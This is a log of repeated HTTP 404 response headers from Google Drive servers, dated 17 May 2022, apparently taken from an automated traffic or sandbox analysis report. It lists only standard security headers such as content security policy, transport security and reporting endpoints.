                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:42 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uXoaedHmkFa4hQoR5eUtZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:42 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EMIjm2E+huNAWOdNW+IrLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:42 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-FYWP0dNavBVsdFEddryHMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:42 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-FXTL+mQQg+If4qpXWREhzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:42 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-oznWNb7Jt/q1G6Z8ux//yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:42 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-EWDp7uW25uVg710xb+5V5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:42 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-GTCyW95/+Khfn0E2RoDPDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:43 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EDercS37ISxPN8iy/C9ZfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:43 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-sYLQOq6dUyaBcCg5+lRrww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:43 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-9UOqU230jNE/oCaCjtS1Ng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:43 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-sYI57NZW8xZi2bir8F9CRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:43 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ScikXyCbLBe1Fvvwd54v/Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:43 GMTStrict-Transport-Security: max-age=31536000Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: script-src 'report-sample' 'nonce-nno7p0F6hK0MrbsPWaF66Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:44 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-6hynFQ8ihTuehd7Mt5XPzQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:44 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-puc0Y7teBKGrTWggy806bA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:44 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-2W/lJBZL5JRrHG/V6CPymw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:44 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-lkYuTXoDk4eaGN6d+EwXLg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:45 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-p8qHOb5BFsu+kHrUapqWDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 17 May 2022 11:31:45 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-s18nRCFvlmAYvPurvnIVyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
